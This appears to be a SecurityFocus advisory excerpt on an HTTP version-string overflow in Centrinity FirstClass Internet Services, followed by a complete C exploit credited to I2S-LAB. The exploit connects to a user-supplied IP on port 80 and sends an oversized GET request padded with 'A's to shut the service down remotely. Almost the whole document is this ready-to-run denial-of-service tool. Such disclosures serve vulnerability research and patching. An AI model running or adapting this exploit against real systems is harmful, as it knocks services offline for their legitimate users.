// source: https://www.securityfocus.com/bid/8793/info
A problem has been reported in the handling of overly long HTTP version string data by Centrinity FirstClass. Because of this, it may be possible for an attacker deny service to legitimate users of a vulnerable system. This may be due to an exploitable boundary condition error, though this is not confirmed.
/*******************************************
* FirstClass Internet Services Remote DoS *
*******************************************
discovered & coded by I2S-LAB
--------------------------------------------
This exploit uses a ptr overflow to remotely
shutdown the Internet Services of FirstClass.
CONTACT
_______
Fred CHAVEROT : fred[at]I2S-LAB.com
Aur=E9lien BOUDOUX : aurelien[at]I2S-LAB.com
URL : http://www.I2S-LaB.com
*******************************************/
#include <windows.h>
#include <winsock.h>
#pragma comment (lib,"wsock32.lib")
#define PerfectOverwrite 246
void main (int argc, char *argv[])
{
int len;
SOCKET sock1;
SOCKADDR_IN sin;
char *sav;
WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);
printf ("- FirsClass Internet Services Remote DoS -\n\n"
"Discovered & coded by I2S-LAB\n"
"http://www.I2S-LaB.com\n\n");
if (!argv[1])
{
printf ("Usage : %s <IP Address>\n", argv[0]);
ExitProcess (0);
}
if (WSAStartup(wVersionRequested, &wsadata) ) ExitProcess (0);
if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
{
printf ("Error ! cannot allocate enough memory.\n");
ExitProcess (0);
};
lstrcat (sav, "GET / HTTP/1.1");
memset (&sav[14], 'A', PerfectOverwrite - 4);
lstrcat (sav,"DDDD\r\n\r\n");
sin.sin_family = AF_INET;
sin.sin_port = htons (80);
if ( (sin.sin_addr.s_addr=inet_addr (argv[1])) == INADDR_NONE)
{
printf ("Incorrect IP Address : %s\n", argv[1]);
ExitProcess(0);
}
sock1 = socket (AF_INET, SOCK_STREAM, 0);
printf ("\nconnecting to %s...", argv[1]);
if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) == SOCKET_ERROR )
printf ("connection failed!\n");
else
{
printf ("ok!\nSending crafted request...");
send (sock1,sav, PerfectOverwrite + 18,0);
puts ("ok!");
}
closesocket (sock1);
}